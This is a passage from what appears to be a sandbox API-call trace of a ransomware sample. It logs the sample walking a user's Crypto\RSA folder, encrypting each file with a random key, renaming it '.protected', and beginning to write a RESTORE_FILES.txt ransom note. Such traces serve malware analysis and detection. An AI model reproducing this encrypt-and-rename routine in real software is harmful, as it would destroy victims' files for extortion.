1 [0089.879] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="Windows") returned -1 [0089.879] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="Program Files") returned 1 [0089.879] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="Program Files (x86)") returned 1 [0089.879] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="$Recycle.bin") returned 1 [0089.879] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="System Volume Information") returned -1 [0089.879] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 117 [0089.879] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2=".") returned 1 [0089.879] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="..") returned 1 [0089.880] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*") returned 119 [0089.880] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.891] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.891] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.891] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.891] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.891] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.891] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\.") returned 119 [0089.891] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.891] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.891] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.891] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.891] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.891] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.891] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.891] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.891] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.891] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.891] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.891] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\..") returned 120 [0089.891] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.891] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.892] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.892] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.892] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.892] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.892] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.892] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Windows") returned -1 [0089.892] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files") returned -1 [0089.892] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files (x86)") returned -1 [0089.892] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="$Recycle.bin") returned 1 [0089.892] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="System Volume Information") returned -1 [0089.892] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.892] StrStrIW (lpFirst="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".protected") returned 0x0 [0089.892] lstrcmpW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="RESTORE_FILES.txt") returned -1 [0089.892] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.892] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.893] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.893] StrStrW (lpFirst="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".txt") returned 0x0 [0089.893] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.893] StrStrW (lpFirst="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".rar") returned 0x0 [0089.893] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.893] StrStrW (lpFirst="83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".zip") returned 0x0 [0089.893] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2d, lpOverlapped=0x0) returned 1 [0089.894] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffd3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.894] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2d, lpOverlapped=0x0) returned 1 [0089.894] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.894] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.894] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.895] CloseHandle (hObject=0x154) returned 1 [0089.895] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected") returned 197 [0089.895] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected")) returned 1 [0089.896] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.896] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Windows") returned -1 [0089.896] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files") returned -1 [0089.896] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files (x86)") returned -1 [0089.896] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="$Recycle.bin") returned 1 [0089.896] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="System Volume Information") returned -1 [0089.896] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.896] StrStrIW (lpFirst="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".protected") returned 0x0 [0089.896] lstrcmpW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="RESTORE_FILES.txt") returned -1 [0089.896] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.896] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.897] StrStrW (lpFirst="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".txt") returned 0x0 [0089.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.897] StrStrW (lpFirst="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".rar") returned 0x0 [0089.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.897] StrStrW (lpFirst="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".zip") returned 0x0 [0089.897] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x57, lpOverlapped=0x0) returned 1 [0089.898] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffa9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.898] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x57, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x57, lpOverlapped=0x0) returned 1 [0089.898] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.898] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.898] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.898] CloseHandle (hObject=0x154) returned 1 [0089.899] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected") returned 197 [0089.899] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected")) returned 1 [0089.899] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.899] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Windows") returned -1 [0089.899] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files") returned -1 [0089.899] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files (x86)") returned -1 [0089.899] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="$Recycle.bin") returned 1 [0089.899] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="System Volume Information") returned -1 [0089.899] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.899] StrStrIW (lpFirst="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".protected") returned 0x0 [0089.899] lstrcmpW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="RESTORE_FILES.txt") returned -1 [0089.899] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.900] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.900] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.901] StrStrW (lpFirst="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".txt") returned 0x0 [0089.901] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.901] StrStrW (lpFirst="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".rar") returned 0x0 [0089.901] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0089.901] StrStrW (lpFirst="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".zip") returned 0x0 [0089.901] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x3d, lpOverlapped=0x0) returned 1 [0089.901] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffc3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.902] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x3d, lpOverlapped=0x0) returned 1 [0089.902] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.902] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.902] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.902] CloseHandle (hObject=0x154) returned 1 [0089.902] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected") returned 197 [0089.902] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected")) returned 1 [0089.903] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.903] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.903] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\RESTORE_FILES.txt") returned 135 [0089.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 